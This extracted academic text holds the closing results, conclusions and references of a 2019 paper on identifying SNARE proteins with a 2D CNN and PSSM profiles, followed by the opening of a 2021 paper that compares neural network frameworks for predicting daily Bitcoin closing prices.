shown in Fig. 3 and we decided to choose nadam, an optimizer with consistent performance to create our final model. Improving the performance results and preventing overfitting problem with dropout It can be seen that there was a fair difference in performance between using the cross- validation dataset and the independent dataset. It is due to the non-removing similarity in cross-validation, and now we address this issue. To solve this issue, we applied an important technique called dropout (Srivastava et al., 2014). Table 4 presents the performances of the model when we varied the dropout value from 0 to 1. It can be seen that the performance from the dropout value of 0.1 was higher than others, with the sensitivity, specificity, Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 10/17 https://peerj.com https://doi.org/10.7717/peerjcs.177/fig-3 http://dx.doi.org/10.7717/peerj-cs.177 Table 4 Performance results of identifying SNAREs with different dropout levels. Cross-validation Independent Dropout Sens Spec Acc MCC Sens Spec Acc MCC 0 70.5 93.3 88.2 0.65 57.9 85.7 82.9 0.33 0.1 72.4 94.4 89.5 0.69 44.7 95.4 90.4 0.43 0.2 69.3 93.9 88.4 0.65 50 87.4 83.7 0.3 0.3 69.6 94.2 88.7 0.66 42.1 86 81.7 0.22 0.4 72 92.6 88 0.65 39.5 91.4 86.3 0.29 0.5 69.7 94.8 89.1 0.68 36.8 92.8 87.3 0.29 accuracy, and MCC of 72.4%, 94.4%, 89.5%, and 0.69, respectively. In the independent dataset, the sensitivity, specificity, accuracy, and MCC were 44.7%, 95.4%, 90.4%, and 0.43, respectively. We can see that the performance of the independent dataset has been already improved and moved closer to that of the cross-validation dataset. Therefore, the overfitting problem was gradually resolved, and we used this dropout value for our final model. Moreover, the number of epochs used in the experiment extremely affects the performance results. To discover the optimal epoch, we ran our experiments by ranging the epoch value from the first epoch to the 500th epoch. During this process, we saved the checkpoint with the highest performance and used its parameters to create our model. Until this final step, the independent sensitivity, specificity, accuracy, and MCC reached 65.8%, 90.3%, 87.9% and 0.46, respectively. This result is close to that of the cross-validation dataset at the same level of 2D CNN architecture. Finally, our model applied 256 filter layers, nadam optimizer, and dropout value of 0.1 to identify SNARE proteins with the highest performance. Comparative performance for identifying SNAREs between 2D CNN and shallow neural networks We examined the performances of using different machine learning classifiers for identifying SNARE proteins. We used four different classifiers (i.e., nearest neighbor (kNN), Gaussian, Random Forest, and support vector machine (SVM)) to evaluate the model and compared 2D CNN results with their results. For a fair comparison, we definitely used the optimal parameters for all the classifiers in all the experiments. Table 5 shows the performance results between our method and other machine learning algorithms. It can be seen that our 2D CNN exhibited higher performance than those of the other traditional machine learning techniques using the same experimental setup. Especially, our 2D CNN outperformed other algorithms when using the independent dataset. Comparative performance for identifying SNAREs between 2D CNN and BLAST search pipeline To make our prediction have convincing, we aimed to simply BLASTing the SNARE and non-SNARE sequences. The objective of this step is to check whether the first non-identical match was a SNARE/non-SNARE protein. We then compared with our PSSM via PSI- BLAST and the performance results were shown in Table 6. It is easy to say that we are Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.177 Table 5 Comparative performance between 2D CNN and other shallow neural networks. Classifier Cross-validation Independent Sens Spec Acc MCC Sens Spec Acc MCC kNN 60.1 95.4 87.5 0.62 28.9 95.1 88.6 0.28 RandomForest 59.6 98.2 89.5 0.68 15.8 98 89.9 0.23 Gaussian 93.5 30.5 44.6 0.23 81.6 23.2 28.9 0.03 SVM 35.2 98.1 84 0.48 28.9 97.1 90.4 0.34 2D CNN 76.6 93.5 89.7 0.7 65.8 90.3 87.9 0.46 Table 6 Comparative performance between our classification method and BLAST search pipeline. Method Cross-validation Independent Sens Spec Acc MCC Sens Spec Acc MCC BLAST 37.0 99.3 85.3 0.53 26.3 99.4 92.2 0.44 2D CNN 76.6 93.5 89.7 0.7 65.8 90.3 87.9 0.46 able to reach a better performance when using the PSSM profiles to build a classifier. It also means that BLAST can search a sequence within motifs, but it cannot capture hidden information in sequences. Therefore, it is necessary and useful to create an advanced classifier with stronger features e.g., PSSM profiles in this study. Furthermore, source codes and publicly accessible web-servers represent the current trend for developing various computational methods (Chen et al., 2018; Cheng, Xiao & Chou, 2018a; Cheng, Xiao & Chou, 2018b; Chou, Cheng & Xiao, 2018; Feng et al., 2018; Jia et al., 2019; Khan et al., 2018; Le, Ho & Ou, 2019; Xiao et al., 2018b). Actually, they have significantly enhanced the impacts of computational biology on medical science (Chou, 2015), driving medicinal chemistry into an unprecedented revolution (Chou, 2017), here we also publish our source codes and dataset at https://github.com/khanhlee/snare-cnn for presenting the new method reported in this paper. CONCLUSIONS Deep learning, a leading technique in various fields, has been increasingly applied in bioinformatics and computational biology. This study approaches a novel for identifying SNARE proteins by using deep learning. The idea is to transform PSSM profiles into matrices and use them as the input to 2D CNN architectures. We evaluated the performance of our model, which was developed by using a 2D CNN and PSSM profiles, using 5-fold cross-validation and an independent testing dataset. Our method produced superior performance, and compared to other state-of-the-art neural networks, it achieved a significant improvement in all the typical measurement metrics. Using our model, new SNARE proteins can be accurately identified and used for drug development. Moreover, the contribution of this study could help further research to promote the use of 2D CNN in bioinformatics, especially in protein function prediction. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 12/17 https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/10.7717/peerj-cs.177 ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Nguyen Quoc Khanh Le conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Van-Nui Nguyen conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Data is available at GitHub: https://github.com/khanhlee/snare-cnn. REFERENCES Altschul SF, Madden TL, Schäffer AA, Zhang J, Zhang Z, Miller W, Lipman DJ. 1997. Gapped BLAST and PSI-BLAST: a new generation of protein database search programs. Nucleic Acids Research 25(17):3389–3402 DOI 10.1093/nar/25.17.3389. Amidi A, Amidi S, Vlachakis D, Megalooikonomou V, Paragios N, Zacharaki EI. 2018. EnzyNet: enzyme classification using 3D convolutional neural networks on spatial representation. PeerJ 6:e4750 DOI 10.7717/peerj.4750. Burlet G, Hindle A. 2017. Isolated guitar transcription using a deep belief network. PeerJ Computer Science 3:e109 DOI 10.7717/peerj-cs.109. Chang C-C, Lin C-J. 2011. LIBSVM: a library for support vector machines. ACM Transactions on Intelligent Systems and Technology 2(3):Article 27. Chen J, Liu H, Yang J, Chou K-C. 2007. Prediction of linear B-cell epitopes using amino acid pair antigenicity scale. Amino Acids 33(3):423–428 DOI 10.1007/s00726-006-0485-9. Chen W, Ding H, Zhou X, Lin H, Chou K-C. 2018. iRNA(m6A)-PseDNC: identifying N6-methyladenosine sites using pseudo dinucleotide composition. Analytical Biochemistry 561–562:59–65 DOI 10.1016/j.ab.2018.09.002. Chen W, Feng P-M, Lin H, Chou K-C. 2013. iRSpot-PseDNC: identify recombination spots with pseudo dinucleotide composition. Nucleic Acids Research 41(6):e68-e68 DOI 10.1093/nar/gks1450. Cheng X, Xiao X, Chou K-C. 2017a. pLoc-mPlant: predict subcellular localization of multi-location plant proteins by incorporating the optimal GO information into general PseAAC. Molecular BioSystems 13(9):1722–1727 DOI 10.1039/C7MB00267J. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 13/17 https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/10.1093/nar/25.17.3389 http://dx.doi.org/10.7717/peerj.4750 http://dx.doi.org/10.7717/peerj-cs.109 http://dx.doi.org/10.1007/s00726-006-0485-9 http://dx.doi.org/10.1016/j.ab.2018.09.002 http://dx.doi.org/10.1093/nar/gks1450 http://dx.doi.org/10.1039/C7MB00267J http://dx.doi.org/10.7717/peerj-cs.177 Cheng X, Xiao X, Chou K-C. 2017b. pLoc-mVirus: predict subcellular localization of multi-location virus proteins via incorporating the optimal GO information into general PseAAC. Gene 628:315–321 DOI 10.1016/j.gene.2017.07.036. Cheng X, Xiao X, Chou K-C. 2018a. pLoc-mEuk: predict subcellular localization of multi-label eukaryotic proteins by extracting the key GO information into general PseAAC. Genomics 110(1):50–58 DOI 10.1016/j.ygeno.2017.08.005. Cheng X, Xiao X, Chou K-C. 2018b. pLoc-mGneg: Predict subcellular localization of Gram-negative bacterial proteins by deep gene ontology learning via general PseAAC. Genomics 110(4):231–239 DOI 10.1016/j.ygeno.2017.10.002. Cheng X, Zhao S-G, Lin W-Z, Xiao X, Chou K-C. 2017a. pLoc-mAnimal: predict subcellular localization of animal proteins with both single and multiple sites. Bioinformatics 33(22):3524–3531 DOI 10.1093/bioinformatics/btx476. Cheng X, Zhao S-G, Xiao X, Chou K-C. 2017b. iATC-mISF: a multi-label classifier for predicting the classes of anatomical therapeutic chemicals. Bioinformatics 33(3):341–346 DOI 10.1093/bioinformatics/btw644. Chou K-C. 2001. Prediction of signal peptides using scaled window. Peptides 22(12):1973–1979 DOI 10.1016/S0196-9781(01)00540-x. Chou K-C. 2011. Some remarks on protein attribute prediction and pseudo amino acid composition. Journal of Theoretical Biology 273(1):236–247 DOI 10.1016/j.jtbi.2010.12.024. Chou K-C. 2013. Some remarks on predicting multi-label attributes in molecular biosystems. Molecular BioSystems 9(6):1092–1100 DOI 10.1039/C3MB25555G. Chou K-C. 2015. Impacts of bioinformatics to medicinal chemistry. Medicinal Chemistry 11(3):218–234 DOI 10.2174/1573406411666141229162834. Chou K-C. 2017. An unprecedented revolution in medicinal chemistry driven by the progress of biological science. Current Topics in Medicinal Chemistry 17(21):2337–2358 DOI 10.2174/1568026617666170414145508. Chou K-C, Cheng X, Xiao X. 2018. pLoc_bal-mHum: predict subcellular localization of human proteins by PseAAC and quasi-balancing training dataset. Genomics DOI 10.1016/j.ygeno.2018.08.007. Feng P, Yang H, Ding H, Lin H, Chen W, Chou K-C. 2018. iDNA6mA-PseKNC: identi- fying DNA N6-methyladenosine sites by incorporating nucleotide physicochemical properties into PseKNC. Genomics 111(1):96–102 DOI 10.1016/j.ygeno.2018.01.005. Feng P-M, Chen W, Lin H, Chou K-C. 2013. iHSP-PseRAAAC: identifying the heat shock protein families using pseudo reduced amino acid alphabet composition. Analytical Biochemistry 442(1):118–125 DOI 10.1016/j.ab.2013.05.024. Fernandes K, Chicco D, Cardoso JS, Fernandes J. 2018. Supervised deep learning embeddings for the prediction of cervical cancer diagnosis. PeerJ Computer Science 4:e154 DOI 10.7717/peerj-cs.154. Honer WG, Falkai P, Bayer TA, Xie J, Hu L, Li H-Y, Arango V, Mann JJ, Dwork AJ, Trimble WS. 2002. Abnormalities of SNARE mechanism proteins in an- terior frontal cortex in severe mental illness. Cerebral Cortex 12(4):349–356 DOI 10.1093/cercor/12.4.349. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 14/17 https://peerj.com http://dx.doi.org/10.1016/j.gene.2017.07.036 http://dx.doi.org/10.1016/j.ygeno.2017.08.005 http://dx.doi.org/10.1016/j.ygeno.2017.10.002 http://dx.doi.org/10.1093/bioinformatics/btx476 http://dx.doi.org/10.1093/bioinformatics/btw644 http://dx.doi.org/10.1016/S0196-9781(01)00540-x http://dx.doi.org/10.1016/j.jtbi.2010.12.024 http://dx.doi.org/10.1039/C3MB25555G http://dx.doi.org/10.2174/1573406411666141229162834 http://dx.doi.org/10.2174/1568026617666170414145508 http://dx.doi.org/10.1016/j.ygeno.2018.08.007 http://dx.doi.org/10.1016/j.ygeno.2018.01.005 http://dx.doi.org/10.1016/j.ab.2013.05.024 http://dx.doi.org/10.7717/peerj-cs.154 http://dx.doi.org/10.1093/cercor/12.4.349 http://dx.doi.org/10.7717/peerj-cs.177 Hou C, Wang Y, Liu J, Wang C, Long J. 2017. Neurodegenerative disease related proteins have negative effects on SNARE-mediated membrane fusion in pathological confir- mation. Frontiers in Molecular Neuroscience 10:66 DOI 10.3389/fnmol.2017.00066. Jahn R, Scheller RH. 2006. SNAREs—engines for membrane fusion. Nature Reviews Molecular Cell Biology 7:631–643 DOI 10.1038/nrm2002. Jia J, Li X, Qiu W, Xiao X, Chou K-C. 2019. iPPI-PseAAC(CGR): Identify protein- protein interactions by incorporating chaos game representation into PseAAC. Journal of Theoretical Biology 460:195–203 DOI 10.1016/j.jtbi.2018.10.021. Jones DT. 1999. Protein secondary structure prediction based on position-specific scoring matrices1. Journal of Molecular Biology 292(2):195–202 DOI 10.1006/jmbi.1999.3091. Khan YD, Rasool N, Hussain W, Khan SA, Chou K-C. 2018. iPhosT-PseAAC: identify phosphothreonine sites by incorporating sequence statistical moments into PseAAC. Analytical Biochemistry 550:109–116 DOI 10.1016/j.ab.2018.04.021. Kienle N, Kloepper TH, Fasshauer D. 2009. Phylogeny of the SNARE vesicle fusion machinery yields insights into the conservation of the secretory pathway in fungi. BMC Evolutionary Biology 9(1):19 DOI 10.1186/1471-2148-9-19. Kloepper TH, Kienle CN, Fasshauer D. 2007. An elaborate classification of SNARE proteins sheds light on the conservation of the eukaryotic endomembrane system. Molecular Biology of the Cell 18(9):3463–3471 DOI 10.1091/mbc.e07-03-0193. Kloepper TH, Kienle CN, Fasshauer D. 2008. SNAREing the basis of multicellularity: consequences of protein family expansion during evolution. Molecular Biology and Evolution 25(9):2055–2068 DOI 10.1093/molbev/msn151. Le NQK, Ho Q-T, Ou Y-Y. 2017. Incorporating deep learning with convolutional neural networks and position specific scoring matrices for identifying electron transport proteins. Journal of Computational Chemistry 38(23):2000–2006 DOI 10.1002/jcc.24842. Le NQK, Ho Q-T, Ou Y-Y. 2018. Classifying the molecular functions of Rab GTPases in membrane trafficking using deep convolutional neural networks. Analytical Biochemistry 555:33–41 DOI 10.1016/j.ab.2018.06.011. Le NQK, Ho Q-T, Ou Y-Y. 2019. Using two-dimensional convolutional neural networks for identifying GTP binding sites in Rab proteins. Journal of Bioinformatics and Computational Biology 17(1):1950005 DOI 10.1142/s0219720019500057. Le NQK, Nguyen T-T-D, Ou Y-Y. 2017. Identifying the molecular functions of electron transport proteins using radial basis function networks and bio- chemical properties. Journal of Molecular Graphics and Modelling 73:166–178 DOI 10.1016/j.jmgm.2017.01.003. Le NQK, Ou Y-Y. 2016a. Incorporating efficient radial basis function networks and significant amino acid pairs for predicting GTP binding sites in transport proteins. BMC Bioinformatics 17(19):501 DOI 10.1186/s12859-016-1369-y. Le NQK, Ou Y-Y. 2016b. Prediction of FAD binding sites in electron transport proteins according to efficient radial basis function networks and significant amino acid pairs. BMC Bioinformatics 17(1):298 DOI 10.1186/s12859-016-1163-x. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 15/17 https://peerj.com http://dx.doi.org/10.3389/fnmol.2017.00066 http://dx.doi.org/10.1038/nrm2002 http://dx.doi.org/10.1016/j.jtbi.2018.10.021 http://dx.doi.org/10.1006/jmbi.1999.3091 http://dx.doi.org/10.1016/j.ab.2018.04.021 http://dx.doi.org/10.1186/1471-2148-9-19 http://dx.doi.org/10.1091/mbc.e07-03-0193 http://dx.doi.org/10.1093/molbev/msn151 http://dx.doi.org/10.1002/jcc.24842 http://dx.doi.org/10.1016/j.ab.2018.06.011 http://dx.doi.org/10.1142/s0219720019500057 http://dx.doi.org/10.1016/j.jmgm.2017.01.003 http://dx.doi.org/10.1186/s12859-016-1369-y http://dx.doi.org/10.1186/s12859-016-1163-x http://dx.doi.org/10.7717/peerj-cs.177 Le NQK, Sandag GA, Ou Y-Y. 2018. Incorporating post translational modification information for enhancing the predictive performance of membrane transport proteins. Computational Biology and Chemistry 77:251–260 DOI 10.1016/j.compbiolchem.2018.10.010. LeCun Y, Bengio Y, Hinton G. 2015. Deep learning. Nature 521(7553):436–444 DOI 10.1038/nature14539. Lu B. 2015. The destructive effect of botulinum neurotoxins on the SNARE protein: SNAP-25 and synaptic membrane fusion. PeerJ 3:e1065 DOI 10.7717/peerj.1065. Meng J, Wang J. 2015. Role of SNARE proteins in tumourigenesis and their potential as targets for novel anti-cancer therapeutics. Biochimica et Biophysica Acta (BBA) - Reviews on Cancer 1856(1):1–12 DOI 10.1016/j.bbcan.2015.04.002. Ou YY, Chen SA, Gromiha MM. 2010. Classification of transporters using efficient radial basis function networks with position-specific scoring matrices and biochemical properties. Proteins: Structure, Function, and Bioinformatics 78(7):1789–1797 DOI 10.1002/prot.22694. Oyang Y-J, Hwang S-C, Ou Y-Y, Chen C-Y, Chen Z-W. 2005. Data classifica- tion with radial basis function networks based on a novel kernel density es- timation algorithm. IEEE Transactions on Neural Networks 16(1):225–236 DOI 10.1109/TNN.2004.836229. Palatnik de Sousa I. 2018. Convolutional ensembles for Arabic handwritten character and digit recognition. PeerJ Computer Science 4:e167 DOI 10.7717/peerj-cs.167. Qiu W-R, Sun B-Q, Xiao X, Xu Z-C, Chou K-C. 2016. iPTM-mLys: identifying multiple lysine PTM sites and their different types. Bioinformatics 32(20):3116–3123 DOI 10.1093/bioinformatics/btw380. Shi X, Halder P, Yavuz H, Jahn R, Shuman HA. 2016. Direct targeting of membrane fu- sion by SNARE mimicry: convergent evolution of Legionella effectors. Proceedings of the National Academy of Sciences of the United States of America 113(31):8807–8812 DOI 10.1073/pnas.1608755113. Shimizu K, Hirose S, Noguchi T. 2007. POODLE-S: web application for predicting protein disorder by using physicochemical features and reduced amino acid set of a position-specific scoring matrix. Bioinformatics 23(17):2337–2338 DOI 10.1093/bioinformatics/btm330. Spencer M, Eickholt J, Cheng J. 2015. A deep learning network approach to ab initio protein secondary structure prediction. IEEE/ACM Transactions on Computational Biology and Bioinformatics (TCBB) 12(1):103–112 DOI 10.1109/TCBB.2014.2343960. Srivastava N, Hinton G, Krizhevsky A, Sutskever I, Salakhutdinov R. 2014. Dropout: a simple way to prevent neural networks from overfitting. The Journal of Machine Learning Research 15(1):1929–1958. Sun Q, Huang X, Zhang Q, Qu J, Shen Y, Wang X, Sun H, Wang J, Xu L, Chen X, Ren B. 2016. SNAP23 promotes the malignant process of ovarian cancer. Journal of Ovarian Research 9(1):80 DOI 10.1186/s13048-016-0289-9. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 16/17 https://peerj.com http://dx.doi.org/10.1016/j.compbiolchem.2018.10.010 http://dx.doi.org/10.1038/nature14539 http://dx.doi.org/10.7717/peerj.1065 http://dx.doi.org/10.1016/j.bbcan.2015.04.002 http://dx.doi.org/10.1002/prot.22694 http://dx.doi.org/10.1109/TNN.2004.836229 http://dx.doi.org/10.7717/peerj-cs.167 http://dx.doi.org/10.1093/bioinformatics/btw380 http://dx.doi.org/10.1073/pnas.1608755113 http://dx.doi.org/10.1093/bioinformatics/btm330 http://dx.doi.org/10.1109/TCBB.2014.2343960 http://dx.doi.org/10.1186/s13048-016-0289-9 http://dx.doi.org/10.7717/peerj-cs.177 Taju SW, Nguyen T-T-D, Le N-Q-K, Kusuma RMI, Ou Y-Y. 2018. DeepEfflux: a 2D convolutional neural network model for identifying families of efflux proteins in transporters. Bioinformatics 34(18):3111–3117 DOI 10.1093/bioinformatics/bty302. UniProt Consortium. 2014. UniProt: a hub for protein information. Nucleic Acids Research 43(D1):D204–D212 DOI 10.1093/nar/gku989. Van Dijk ADJ, Bosch D, ter Braak CJF, van der Krol AR, van Ham RCHJ. 2008. Predicting sub-Golgi localization of type II membrane proteins. Bioinformatics 24(16):1779–1786 DOI 10.1093/bioinformatics/btn309. Wang K, Hoeksema J, Liang C. 2018. piRNN: deep learning algorithm for piRNA prediction. PeerJ 6:e5429 DOI 10.7717/peerj.5429. Weimbs T, Low SH, Chapin SJ, Mostov KE, Bucher P, Hofmann K. 1997. A conserved domain is present in different families of vesicular fusion proteins: a new superfam- ily. Proceedings of the National Academy of Sciences of the United States of America 94(7):3046–3051 DOI 10.1073/pnas.94.7.3046. Wickner W, Schekman R. 2008. Membrane fusion. Nature Structural & Molecular Biology 15(7):658 DOI 10.1038/nsmb.1451. Xiao X, Cheng X, Chen G, Mao Q, Chou K-C. 2018a. pLoc_bal-mGpos: predict sub- cellular localization of Gram-positive bacterial proteins by quasi-balancing training dataset and PseAAC. Genomics DOI 10.1016/j.ygeno.2018.05.017. Xiao X, Xu Z-C, Qiu W-R, Wang P, Ge H-T, Chou K-C. 2018b. iPSW(2L)-PseKNC: a two-layer predictor for identifying promoters and their strength by hybrid features via pseudo K-tuple nucleotide composition. Genomics DOI 10.1016/j.ygeno.2018.12.001. Xu Y, Shao X-J, Wu L-Y, Deng N-Y, Chou K-C. 2013. iSNO-AAPair: incorporating amino acid pairwise coupling into PseAAC for predicting cysteine S-nitrosylation sites in proteins. PeerJ 1:e171 DOI 10.7717/peerj.171. Yoshizawa AC, Kawashima S, Okuda S, Fujita M, Itoh M, Moriya Y, Hattori M, Kanehisa M. 2006. Extracting sequence motifs and the phylogenetic features of SNARE-dependent membrane traffic. Traffic 7(8):1104–1118 DOI 10.1111/j.1600-0854.2006.00451.x. Le and Nguyen (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.177 17/17 https://peerj.com http://dx.doi.org/10.1093/bioinformatics/bty302 http://dx.doi.org/10.1093/nar/gku989 http://dx.doi.org/10.1093/bioinformatics/btn309 http://dx.doi.org/10.7717/peerj.5429 http://dx.doi.org/10.1073/pnas.94.7.3046 http://dx.doi.org/10.1038/nsmb.1451 http://dx.doi.org/10.1016/j.ygeno.2018.05.017 http://dx.doi.org/10.1016/j.ygeno.2018.12.001 http://dx.doi.org/10.7717/peerj.171 http://dx.doi.org/10.1111/j.1600-0854.2006.00451.x http://dx.doi.org/10.7717/peerj-cs.177 work_co3aluz27vf67mmx2gwt73nree ---- Predictions of bitcoin prices through machine learning based frameworks Predictions of bitcoin prices through machine learning based frameworks Luisanna Cocco, Roberto Tonelli and Michele Marchesi Department of Mathematics and Computer Science, University of Cagliari, Cagliari, Italy ABSTRACT The high volatility of an asset in financial markets is commonly seen as a negative factor. However short-term trades may entail high profits if traders open and close the correct positions. The high volatility of cryptocurrencies, and in particular of Bitcoin, is what made cryptocurrency trading so profitable in these last years. The main goal of this work is to compare several frameworks each other to predict the daily closing Bitcoin price, investigating those that provide the best performance, after a rigorous model selection by the so-called k-fold cross validation method. We evaluated the performance of one stage frameworks, based only on one machine learning technique, such as the Bayesian Neural Network, the Feed Forward and the Long Short Term Memory Neural Networks, and that of two stages frameworks formed by the neural networks just mentioned in cascade to Support Vector Regression. Results highlight higher performance of the two stages frameworks with respect to the correspondent one stage frameworks, but for the Bayesian Neural Network. The one stage framework based on Bayesian Neural Network has the highest performance and the order of magnitude of the mean absolute percentage error computed on the predicted price by this framework is in agreement with those reported in recent literature works. Subjects Artificial Intelligence, Data Mining and Machine Learning Keywords Machine learning, Cryptocurrencies, Technical indicators, Bayesian neural network INTRODUCTION Unlike the volatility of traditional market assets, the volatility of cryptocurrency markets is very high, and albeit they share the characteristics of traditional stock markets, they are highly unstable. Indeed these markets are decentralized and unregulated, and also subject to manipulation. Nowadays many are the entrepreneurs who invest in block-chain, the well known technology underlying the most popular cryptocurrencies including Bitcoin, and we can expect that this number will grow as the Bitcoin utility increases; and many are the people who speculate on the bitcoin price. Speculating on the Bitcoin market may offer the opportunity to obtain substantial returns, but it may also entail a very high risk. So to judge the best time to enter the market is extremely important in order to get profits and not to lose too much money. The price of Bitcoin changes every day, just like the price of fiat currencies. However the Bitcoin price changes are on a greater scale than that of the fiat currency changes. As a result to get an idea of the future price trend can be extremely important. To date, several on-line platforms make available several technical analysis tools that allow the bitcoin How to cite this article Cocco L, Tonelli R, Marchesi M. 2021. Predictions of bitcoin prices through machine learning based frameworks. PeerJ Comput. Sci. 7:e413 DOI 10.7717/peerj-cs.413 Submitted 26 September 2020 Accepted 4 February 2021 Published 29 March 2021 Corresponding author Luisanna Cocco, cocco@unica.it Academic editor Ana Reyes-Menendez Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.413 Copyright 2021 Cocco et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.413 mailto:cocco@�unica.�it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.413 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ speculators to identify trends and market sentiment; the number of the research papers that investigate the future bitcoin price trend is increasing. Figures 1 and 2 show the USD/EUR and BTC/USD currency pairs and their volatility. As a measure of volatility we used the moving standard deviation calculated applying the Pandas rolling standard deviation to the logarithmic returns of each just quoted currency pair using a window of 6 days. We computed also the maximum and minimum value of the USD/EUR and BTC/USD currency pairs’ volatility. The maximum value of the BTC/USD volatility is equal to 0.505, whereas the minimum value is equal to 0.005. For USD/EUR the maximum value is one order of magnitude lower. It is equal to 0.031 whereas the minimum value is equal to 0.001. In this article we propose and study some machine learning based frameworks to forecast Bitcoin prices. These frameworks could be used to decide when and how much to invest, and also to build bitcoin trading strategies. The main goal of this work is to analyze the performance of Bayesian Neural Networks (BNN) in predicting the Bitcoin prices, and to compare them with those obtained using other kinds of NNs, such as the Feed Forward Neural Network (FFNN) and the Long Short Term Memory Neural Network (LSTMNN). In addition, following the approach proposed in the work by Patel et al. (2015), we analyzed whether the performance of the FFNN and LSTMNN increases putting each of them in cascade to another ML technique, the so called Support Vector Regression (SVR). Figure 1 (A) Time trend of USD/EUR currency pair and (B) its volatility. Full-size DOI: 10.7717/peerj-cs.413/fig-1 Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 2/23 http://dx.doi.org/10.7717/peerj-cs.413/fig-1 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ Let us define, as in the work by Patel et al. (2015), the first models just described, BNN, FFNN and LSTMNN, as single stage frameworks, and the others, SVR+FFNN and SVR+LSTMNN, as two stages framework. The former predicts the bitcoin price by a single ML technique, the latter instead predicts the bitcoin price by two ML techniques in cascade. All frameworks attempt to predict the Bitcoin prices starting from five technical indicators: the Simple Moving Average (SMA), the Exponential Moving Average (EMA), the Momentum (MOM), the Moving Average Convergence Divergence (MACD) and the Relative Strength Index (RSI). Hence, starting from the value of these five technical indicators at tth day, the one-stage framework aims to predict the daily closing Bitcoin price at (t + n)th day, with n = 1, n = 10 and n = 20 (see Fig. 3). Instead, in the two stages frameworks the first stage, that is formed by an SVR, receives in input the five technical indicators at tth day and predicts the value of the five technical indicators at (t + n)th day; the second stage, that is formed by one of two NNs, receives in input the five technical indicators at (t + n)th day and predicts the daily closing price of Bitcoin at (t + n)th day1, as in the work by Patel et al. (2015) (see Fig. 4). To evaluate the performance of our proposed frameworks, at first we divided the whole data set into train and test set, being the test set equal to 30% of the whole data set. Then, in order to select the best neural network architectures, we calibrated these frameworks applying the k-fold cross-validation method to the train set just mentioned. Figure 2 (A) Time trend of BTC/USD currency pair and (B) its volatility. Full-size DOI: 10.7717/peerj-cs.413/fig-2 1 As in all supervised learning problems, in our problem there are also input patterns (X) and output patterns (y), and given the input patterns an algorithm learns how to predict the output patterns. We transformed our time series data into a supervised learning problem using the shift() function of the well known Python data analysis library, Pandas. Starting from our time series in input, we created copies of columns of lag observations as well as columns of forecast observations, using as inputs those from tth days to t + (n − 1)th day and so transforming a time series dataset in a supervised learning format (see Brownlee (2017a, 2017b) for a detailed description and implementation in Python). Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 3/23 http://dx.doi.org/10.7717/peerj-cs.413/fig-2 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ We selected the best architecture for ANNs and the best architecture for BNNs. Once selected the best architectures, analyzing the average across k-folds of the mean absolute percentage error (MAPE) for each architecture, we trained the best selected architectures on all data set. Final results provide a robust estimation of the performance of these architectures, since they are the MAPE’s average (std) across the several Monte Carlo runs performed. Let us underline that peculiarity of our work is tuning architectures’ hyper parameters by the k-fold cross-validation method, and predicting prices in a young, unstable and immature market such as the cryptocurrency market providing robust results thanks to the Monte Carlo method applied. Note that, we predicted the Bitcoin prices and also the Ethereum prices applying in both cases the same methodologies. In this first work, due to the computational complexity of some proposed frameworks an exhaustive optimization was not performed. Nevertheless, Bitcoin price predictions are comparable with those found in literature and proposed frameworks perform well also when applied to the Ethereum price prediction. The article is organized as follows. Related Work describes Figure 3 Architecture of the one stage framework. Full-size DOI: 10.7717/peerj-cs.413/fig-3 Cocco et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.413 4/23 http://dx.doi.org/10.7717/peerj-cs.413/fig-3 http://dx.doi.org/10.7717/peerj-cs.413 https://peerj.com/computer-science/ related work; the Proposed Framework section presents the frameworks proposed in our work for the prediction of bitcoin price, describing the ML techniques used and their inputs, that are the technical indicators mentioned above and that are built starting from the daily closing bitcoin price series; The Framework’s Calibration and Performance Metric section illustrates the calibration of the proposed frameworks, the training and testing data sets, and the performance metrics with which the proposed frameworks are evaluated; Results presents the results, and finally, Conclusions concludes and discusses future works. RELATED WORK In this work, as already mentioned, the proposed frameworks, and in particular the idea of the approach of one and two stages, stem from the work by Patel et al. (2015). In that work, the authors predict the future values of two Indian stock market indices, CNX Nifty and S&P Bombay Stock Exchange (BSE) Sensex, by the SVR combined with Artificial Neural Network (ANN) and Random Forest (RF) algorithms. They compare the obtained results in these two stages frameworks with those obtained in the single stage frameworks formed each by a single ML technique, ANN, RF and SVR. Contrary to the work by Patel et al. (2015), in our work we investigated also the performance of the BNN. The BNNs are taken into account in the work by Jang & Lee (2018) that use Blockchain information in order to predict the log price and the log volatility of Bitcoin price. In this work, the authors select the relevant inputs studying the multicollinearity problem, and specifically studying for each input the variance inflation factor (VIF) value. Also in a Figure 4 Architecture of the two stages framework. Full-size DOI: 10.7717/peerj-cs.413/fig-4 Cocco et al. (2021), PeerJ Comput. Sci., DOI 